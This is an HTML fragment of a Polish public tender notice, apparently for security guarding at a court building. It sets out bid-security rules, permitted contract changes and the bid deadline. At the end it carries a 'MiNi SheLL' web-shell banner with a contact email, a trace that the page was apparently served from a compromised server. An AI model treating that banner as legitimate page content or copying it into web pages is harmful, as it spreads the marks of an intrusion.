0004<br/>z jednoczesnym określeniem tytułu wpłaty i numeru sprawy. <br/>12.4.	Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego. <br/>12.5.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je z odsetkami wynikającymi <br/>z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.<br/>12.6.	W przypadku wniesienia wadium w formie gwarancji lub poręczenia oryginał gwarancji lub poręczenia należy złożyć w postaci elektronicznej. <br/>12.7.	Na wniosek wykonawcy, którego oferta zostanie uznana za najkorzystniejszą zamawiający zaliczy wadium wpłacone w pieniądzu na poczet zabezpieczenia należytego wykonania umowy.<br/>12.8.	Zamawiający w dowolnym czasie, jednak nie później niż na 3 dni przed upływem ważności wadiów wzywa Wykonawców pod rygorem wykluczenia z postępowania do przedłużenia ważności wadium albo wniesienia nowego wadium na okres niezbędny do zabezpieczenia biegu postępowania <br/>i zawarcia umowy. <br/>12.9.	Zgodnie z art. 98 ust. 6 ustawy PZP, Zamawiający zatrzyma wadium wraz z odsetkami, <br/>w przypadku gdy : <br/>a.	Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust .1 ustawy PZP, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 lub art. 106 ust. 1 ustawy PZP, oświadczenia, o którym mowa w art. 125 ust. 1, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej;<br/>b.	wykonawca, którego oferta została wybrana:<br/>	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;<br/>	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<br/>c.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy, którego oferta została wybrana. <br/><br/>UWAGA:<br/>Zamawiający zastrzega sobie prawo do sprawdzenia u Wystawcy prawidłowości wystawienia przedstawionej przez Wykonawcę formy wadium innej niż pieniądz. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem następujących przypadków:<br/>1) powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony;<br/>2) zaistnienia innej, niemożliwej do przewidzenia w momencie zawarcia umowy<br/>okoliczności prawnej, ekonomicznej lub technicznej, za którą żadna ze Stron nie ponosi odpowiedzialności, skutkującej brakiem należytego wykonania umowy w tym zakresie;<br/>3) wystąpienia okoliczności, w wyniku których będzie konieczne zwiększenie obsady pracowników ochrony fizycznej w budynku Sądu (np. prowadzenie robót budowlanych w ochranianych budynkach, organizowanie imprez masowych przed ochranianymi budynkami);<br/>4) zmian stawki podatku VAT w trakcie obowiązywania umowy. W takiej sytuacji<br/>Zamawiający dopuszcza zmianę w zakresie cen jednostkowych brutto podanych w złożonym „formularzu cenowym” o różnicę wynikającą ze zmiany wysokości podatku VAT;<br/>5) zmiany umowy zgodnie z §2 ust. 4 tj. przypadku, w którym zakres umowy zostanie czasowo lub trwale zmniejszony do rzeczywistych potrzeb Zamawiającego wraz z proporcjonalnym zmniejszeniem wynagrodzenia, o czym Zamawiający poinformuje pisemnie Wykonawcę nie później niż na 30 dni przed planowaną zmianą zakresu umowy, przy czym zmniejszenie może nastąpić maksymalnie o 80% wielkości umowy.<br/><br/>2. Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej Umowy, na podstawie art.455 ustawy PZP.<br/><br/>3. Każda zmiana do umowy wymaga formy pisemnej pod rygorem nieważności<br/>i musi być dokonana poprzez sporządzenie zmiany do umowy – Aneksu lub w przypadku ust. 1 pkt. 5) wypowiedzenia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie żądania określonej etykiety lub wskazania mającego zastosowanie wymagania określonej etykiety, zgodnie z art. 104 ustawy: - etykiety społecznej</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-25 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Zamawiający dopuszcza jedynie złożenie oferty w formie elektronicznej przy wykorzystaniu portalu e-Usług SMARTPZP. Potwierdzeniem złożonej oferty jest wygenerowany z portalu raport z numerem oferty oraz terminem jej złożenia.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-25 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com